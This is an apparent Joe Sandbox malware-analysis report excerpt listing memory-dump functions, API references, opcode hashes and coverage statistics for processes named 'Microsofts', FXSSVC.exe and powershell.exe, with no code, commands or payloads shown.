Function 04B95F08 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

d8cq, xrefs: 04B95F60

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: d8cq
API String ID: 0-3601494702
Opcode ID: e9aa122fb3c8aa5aabfff150141b1687af89bb08ea96057a455e742754c019b4
Instruction ID: 22bf146896e79b216557287556d4088f37cf3dead623340317a825bca5d5b0ae
Opcode Fuzzy Hash: e9aa122fb3c8aa5aabfff150141b1687af89bb08ea96057a455e742754c019b4
Instruction Fuzzy Hash: B641EF353406008FDB299B39D494A6E7BE6EF85310B1548BDE146CB7B1EB21EC06C790

Function 04B982F8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04B98383

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9e798169d96b2ea24385156f809c6bf38f392d7a4f157a00a957d341e1e57fbc
Instruction ID: bbdee5c4312b1d8758b97ba4586d32ce575395b5c1c3bafb1f3c78c61a267b76
Opcode Fuzzy Hash: 9e798169d96b2ea24385156f809c6bf38f392d7a4f157a00a957d341e1e57fbc
Instruction Fuzzy Hash: 624135756141159FCF15AF28D948AAE3BF2EF49311F1000AAF9068B3A1DB75ED42DBA0

Function 04B98640 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04B986BA

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 734c28c31a2aa86c1d36610d6839469cc33ddd64930efff2d1fea28d9343df67
Instruction ID: 53eb7b6eb73e6945fa133bd6f2af67b7ef4795731d7e51934ab1ed4046363421
Opcode Fuzzy Hash: 734c28c31a2aa86c1d36610d6839469cc33ddd64930efff2d1fea28d9343df67
Instruction Fuzzy Hash: 7621F9353181458BCF15EE6AD880ABB7BE6EF87310B1488BAE501CB258EB74FC41D760

Function 04B95EF8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

d8cq, xrefs: 04B95F60

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID: d8cq
API String ID: 0-3601494702
Opcode ID: 59d9d65e2c1a07522c9f15ff9c962abb2b2affa14e5c3bc7d9d69c7bfd9c737b
Instruction ID: 1b814c18414973094c88ff1f324cd26c5f7ece75d8c4ef01dfc8da6e84a9b8c8
Opcode Fuzzy Hash: 59d9d65e2c1a07522c9f15ff9c962abb2b2affa14e5c3bc7d9d69c7bfd9c737b
Instruction Fuzzy Hash: FF119E32640B414FCB369F2DC554B6EBBE6EFC0314F0589ADD0968B676EB60E8498781

Function 04B962A8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367de908750255bf10ec61b27661d43955c2b718962480e337e6b1bdef0bb374
Instruction ID: aea413aa530d01f22d0f24450ec579a71846e98bd4995dcd29c8a59ab1be1cfb
Opcode Fuzzy Hash: 367de908750255bf10ec61b27661d43955c2b718962480e337e6b1bdef0bb374
Instruction Fuzzy Hash: A471BF347052118FCB199F79D59462E7BE6EBC9300B1884BAE906CB395DF34EC46CB91

Function 04B984F8 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cfce301903034b8efd5d9fa4ba004ff0341c30febbfe54015e2bc43bf2d9e25
Instruction ID: b5ad0b412f6796cb24aade1b7e37b4ca92d9c780f66ff357c491d0c923f107dc
Opcode Fuzzy Hash: 3cfce301903034b8efd5d9fa4ba004ff0341c30febbfe54015e2bc43bf2d9e25
Instruction Fuzzy Hash: DE516D317241119FCB14EF39D89896A7BE6FF8A35431588FAE416CB262EB31EC05DB50

Function 04B944F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7150b75e8a12d58ce106eb21e9641eed58f7b69feed788e699cc8cb1f34a0b
Instruction ID: 0b608b213229d4c3afca4ba2f8a349c21ce18abf7e7a5e1300a3c604ef93e5a1
Opcode Fuzzy Hash: ef7150b75e8a12d58ce106eb21e9641eed58f7b69feed788e699cc8cb1f34a0b
Instruction Fuzzy Hash: A881B074E412289FDB65DF29D990BDDBBB2BB89300F1080EAD819A7254DB715E86CF40

Function 04B924F8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f59d01087e04b25a26286c5d7b0a9c63e6f9000840f4bdfb4bd62646868dba9
Instruction ID: c2cda897fb29f62e1898af44aafd855dbcf3778217217b71c91f460ea919976c
Opcode Fuzzy Hash: 7f59d01087e04b25a26286c5d7b0a9c63e6f9000840f4bdfb4bd62646868dba9
Instruction Fuzzy Hash: 3D414331E002099BDF19DFA5C890AEEBBF5EF89710F2485A9E405B7240DB70BD46CB91

Function 04B95858 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cff94abf760ac6ac152934d94aa9b83dd4549ce956606fecf2282b38b26808d
Instruction ID: 3be0c14287aeeb73a0b9d7aa165559755c6887cd5a1adc73da934d4dd92e9b30
Opcode Fuzzy Hash: 8cff94abf760ac6ac152934d94aa9b83dd4549ce956606fecf2282b38b26808d
Instruction Fuzzy Hash: 88412932705249AFCF169F64D854AAF3BB2EF88310F00846AFC158B295DB39DD16DB60

Function 04B98729 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a287c20a3b1b14504b0abe502dd1e5d2807e38361bcd53ee87876db580db40db
Instruction ID: 1ff2880c40fb0c1f1442be80abee25c43eec14c8703318de24ffe258a5f366fd
Opcode Fuzzy Hash: a287c20a3b1b14504b0abe502dd1e5d2807e38361bcd53ee87876db580db40db
Instruction Fuzzy Hash: F621E2367242004BDF287A36949467E26D7EFC6784B2480BAD406CF395EB39DC42D391

Function 00A1D006 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2955283032.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a1d000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cc8ad7ac6f5a47f2d06e293336497f2e9cf1641ea2d3543ee56d42bd618596e
Instruction ID: 74ec1c745e7a1aef060e96b97f147ffe1f3d4d3bf368c49334bc7c28b45c46b6
Opcode Fuzzy Hash: 4cc8ad7ac6f5a47f2d06e293336497f2e9cf1641ea2d3543ee56d42bd618596e
Instruction Fuzzy Hash: BD217C7550D3C49FCB03CB24D994711BF71AB46314F28C5DBD8898F2A3C23A985ACB62

Function 00A1D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2955283032.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a1d000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908a2bdd839847ecc29eea7ee7ab2cfd478bc48b6ec59b02642157d6afa92b50
Instruction ID: 1db4c4d579d7ec545d5032044d1c6454727c24341d1dd9c764ff06fe32991d62
Opcode Fuzzy Hash: 908a2bdd839847ecc29eea7ee7ab2cfd478bc48b6ec59b02642157d6afa92b50
Instruction Fuzzy Hash: 35210475504204EFCB14DF14DAC0B66BBA5FB88314F24C66DD80A4B296C33AD887CA62

Function 04B926E9 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4158edfa05daca37467377c18a54ee933f842fa53a639a76e1f891b26be58c30
Instruction ID: 505d67fba630aea100e98a0049173bf8627a6e2f78ad1c7ccd7997730f1a594b
Opcode Fuzzy Hash: 4158edfa05daca37467377c18a54ee933f842fa53a639a76e1f891b26be58c30
Instruction Fuzzy Hash: 8811E6327082949FDF066F7858202AE3FA7EFC5250B0448AAE445DB392CF348D06C3A5

Function 04B92270 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 084520ad79aceb01327dc7aebe4ec4b3717934abaf49dadea0f9a317cb0403af
Instruction ID: 7d92325bf1551f2ace21abaad11de1379a9011b9ffd67b3a13c58a92f2b6ae13
Opcode Fuzzy Hash: 084520ad79aceb01327dc7aebe4ec4b3717934abaf49dadea0f9a317cb0403af
Instruction Fuzzy Hash: 90116776800249EFDB10DF99D804BDEBFF4EB48320F148469E558A7251C335A990DFA1

Function 04B91EB9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9621f565ed8d8869dbce1b10be0049781f144a52cc36a28e44a07051ded23ad
Instruction ID: 008f1c2972bf49c2d7d51d68b11a8f3afa235b10b5ef3ec7317eba6051c65537
Opcode Fuzzy Hash: e9621f565ed8d8869dbce1b10be0049781f144a52cc36a28e44a07051ded23ad
Instruction Fuzzy Hash: A3110634E0054A8FEF00DFBCE854BAEBBF5AB48311F0195A1A918EB345EB30A9418B51

Function 04B92990 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d9d9a1bd7491afe74a150fe812e8987771496761f447cd6a2ea11ac59bc694
Instruction ID: b7fb3d5eb13d02e75786ef9b307a4a365fbd6f3d30f93935b1dbe5321bc94190
Opcode Fuzzy Hash: 27d9d9a1bd7491afe74a150fe812e8987771496761f447cd6a2ea11ac59bc694
Instruction Fuzzy Hash: 21117976800249DFDB10CF99D944BDEBFF4EF48320F148499E554A7251C335A594DFA1

Function 04B960B0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3975b2c36f54bf7719273d2d991b4e4393f2d4c12752a2f117f7aed14f2ebcc
Instruction ID: 2cecc415471d7a23977bb96eb69a76bfc5e49c677dacbdcb0765992a04f6ed40
Opcode Fuzzy Hash: b3975b2c36f54bf7719273d2d991b4e4393f2d4c12752a2f117f7aed14f2ebcc
Instruction Fuzzy Hash: DC01D6337051186BDF059F699810AAF3BDBDBC9750F18807AF505D7280DA71DD129BA0

Function 04B960A0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d4eef6005b39cbfd58689aefcb3fdb182f1e211ca15a16b98973f9eea7a5f3
Instruction ID: 459af7aaa63461ead92a18f5c2a9e4985a354a2ad9ac4d699ef3f703232b150f
Opcode Fuzzy Hash: 57d4eef6005b39cbfd58689aefcb3fdb182f1e211ca15a16b98973f9eea7a5f3
Instruction Fuzzy Hash: 5A01F273A04148AFEB028E659855ADB3BA6EB85350B1880AAF500C7181D6368D12CB60

Function 04B968A1 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba0b8d44030ec4cd1a737e6bba4d03b66ed8fe219668d37236f7ff0d757e861
Instruction ID: 18e5f2bb58d03e4ff60eb226ee2dc3424b817da8547e0919822c44ea4af3d5a1
Opcode Fuzzy Hash: 3ba0b8d44030ec4cd1a737e6bba4d03b66ed8fe219668d37236f7ff0d757e861
Instruction Fuzzy Hash: 7ED0C2366052484FCB06AB74ED954853B27E9C02003068296D0050A5AFDE74198F8350

Function 04B9947D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5bbb13e75838faac1e1d61e214eea2073205d9ea8aaf7735f05baca9959a5d
Instruction ID: d2eaf648837affd546beb6ec7ccdf1ec52ecc5dd898ea1ebe7ca361478fc8ef3
Opcode Fuzzy Hash: ec5bbb13e75838faac1e1d61e214eea2073205d9ea8aaf7735f05baca9959a5d
Instruction Fuzzy Hash: 98D0673AB40018DFCB049F9DE8508DDF7B6FB98221B148516E915A3265CA319925DB64

Function 04B968B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648f6f6837386ac8a5cc52ed8cf9b2c5832e0fb27fa8f5123ff1e65ef7c780ab
Instruction ID: d423ad6030f64e114e5509c06a1cf7dd70fe05620d3325a4b57d895c0c0ff617
Opcode Fuzzy Hash: 648f6f6837386ac8a5cc52ed8cf9b2c5832e0fb27fa8f5123ff1e65ef7c780ab
Instruction Fuzzy Hash: AAC012340443084EC901F765F945956775EE6C03007818621A409062AEDF745D8E5690

Analysis Process: FXSSVC.exePID: 4628, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	97.5%
Signature Coverage:	0%
Total number of Nodes:	79
Total number of Limit Nodes:	6

Executed Functions

Function 00C952A0 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDefaultLangID.KERNELBASE ref: 00C953C4

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID: DefaultLangSystem
String ID:
API String ID: 706401283-0
Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction ID: 28edc0cabe38e86fcc4af0a9187b1f66c8c522dc0a11e6d89bd923b93cb7ec4d
Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction Fuzzy Hash: 5D41076190DE958FDF274326446C3707BA0BB223E2F9D04D7D4A68B0F2D1984E819726

Function 00C98070 Relevance: 4.7, APIs: 3, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction ID: 1119f00bc1876f84fa5489a59afb6a9c73671ac09e34dfda3e9f885ff6fe260e
Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction Fuzzy Hash: 7461443150CE85DFCF658B29881C7397BA0FB57350F68125AE46BC31A0DF288E4D9752

Function 00CB0080 Relevance: 2.0, APIs: 1, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction ID: 2873ded4d7082a2d7e317973e0fb3bc8263b27f62594cc705b2f78a8c14af6cb
Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction Fuzzy Hash: 7AD10531418F098FC728EF59D84A7EBB7E1FBA0310F28461FD856C3164DA74DA498AC2

Function 00C95910 Relevance: 1.9, APIs: 1, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction ID: e16622fd18d44b3fe24e4563c8dc200d8a44406015107cc19ce5cd7648193664
Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction Fuzzy Hash: 3EF1492171CE488FCB6A972D58553FA73D2FB9A320F68019EE45AC3296DD349D06D382

Function 00C95B42 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction ID: 10b397f30d8de2f7aced5a4ce4e6e7c4a9b2f7694c60f9cac118be26c2ce7544
Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction Fuzzy Hash: 3521BD3120CF45CFCF6B9B29849C77466E1EB5D310F6805A6C467CF2E6CA24CE44A356

Function 00C95B09 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction ID: b7eb871c83c9fdeba0f64871be3d0c6341a6ceadcddd5a8c1d7fe87fd25b0cd2
Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction Fuzzy Hash: 4B01F13250DF86CFDF675B358D1C3797B90AB19324F2401ABC497CA0D9EAA08B01E712

Function 00C95B87 Relevance: 1.5, APIs: 1, Instructions: 23
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00C95B90
CreateThread.KERNELBASE ref: 00C95CDF

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction ID: 629765d23cf6ef63ee6a8897d0b063ac86da47f80051ddc7d9592bd8af69b29e
Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction Fuzzy Hash: 52E0863061DB448FDF6B9B2498147193AE5EB88314F1501CEC44AD71D1CB690A058792

Function 00C9599B Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcscpy.LIBCMT ref: 00C959D9

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID: wcscpy
String ID:
API String ID: 1284135714-0
Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction ID: 12fe6d4a772f131293c5acb8f98f6286be5b5a773435e130bf3e5d9db48c2655
Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction Fuzzy Hash: 1E01F97191DE80CFFF17A719405D3796651F754334F2A059AA05ACB092CC344F02B345

Function 00C98090 Relevance: 1.3, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00C98186

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction ID: 70d9cba8eaa4ea97652595a70e19e9f6491df349822974d8cda22baa8f66f4ff
Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction Fuzzy Hash: 54C04C6152DD46965E79064A1C1F0FC26549713751B5C04869C2683220DE558F4B519B

Function 00C9817F Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00C98186

Memory Dump Source

Source File: 00000014.00000002.1751434249.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c90000_FXSSVC.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction ID: 25b69ee1d124e7403cca4e6fc94c41dd2ce116e09c4f40f5d0cf959891d60270
Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction Fuzzy Hash: F0C092A0558909875D38268A2C0E0BD35648723B60F0C4553ED268B360DE598F4B41A3

Analysis Process: powershell.exePID: 6036, Parent PID: 3448COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 04F2B470 Relevance: .3, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cff61e8fc0ce77532b02f0539e2e04163451a5999a98da2e036b56e05d68e91
Instruction ID: f251c834fa9564e0f3c4d8660dcb26f845b04acdf476b9f0db00a28bf9643abc
Opcode Fuzzy Hash: 7cff61e8fc0ce77532b02f0539e2e04163451a5999a98da2e036b56e05d68e91
Instruction Fuzzy Hash: 96918471F406144FEB1AEFB4C4146AEB7E2EFC4604B04892DD54AAB340DF74A90B8BD6

Function 04F2B490 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.1814650770.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee532e25fd7ee5f9d8d9b5a4156730fae53127da51dbb9fdbbea3e504fa26ee8
Instruction ID: 548dafcf28384b01346472a5a13e7320abc1ef277facf2e227c2a43b8e01bb22
Opcode Fuzzy Hash: ee532e25fd7ee5f9d8d9b5a4156730fae53127da51dbb9fdbbea3e504fa26ee8
Instruction Fuzzy Hash: 2C917371F406145BEB1AEFB4C4155AEB7E2DFC4604B04892DD50AAB340DF74B9078BD6

Function 07DF2308 Relevance: 20.6, Strings: 16, Instructions: 643COMMON

Download Yara Rule

Strings

J&l, xrefs: 07DF237F
J&l, xrefs: 07DF25EA
pij, xrefs: 07DF23A0
4'^q, xrefs: 07DF260D
r%l, xrefs: 07DF254F
4'^q, xrefs: 07DF2619
|,j, xrefs: 07DF25DB
r%l, xrefs: 07DF2559
pij, xrefs: 07DF2582
J&l, xrefs: 07DF259E
J&l, xrefs: 07DF23C5
J&l, xrefs: 07DF23D1
J&l, xrefs: 07DF25F6
pij, xrefs: 07DF2416
pij, xrefs: 07DF23B0
pij, xrefs: 07DF2363

Memory Dump Source

Source File: 00000016.00000002.1857483821.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7df0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$pij$pij$pij$pij$pij$|,j$J&l$J&l$J&l$J&l$J&l$J&l$r%l$r%l
API String ID: 0-2387264477
Opcode ID: a983c27cb248d241843444dd2047e899751bc1b82a162d99dcbfc989d789ef11
Instruction ID: c6eed264c71cbe0192813d0772a14c9ec2de347952b91cff4f29200aba01427c
Opcode Fuzzy Hash: a983c27cb248d241843444dd2047e899751bc1b82a162d99dcbfc989d789ef11
Instruction Fuzzy Hash: 902225B1B0020A9FCB149F69C8517AEFBE1BF85311F15807AEA45CB251DB31ED85CBA1

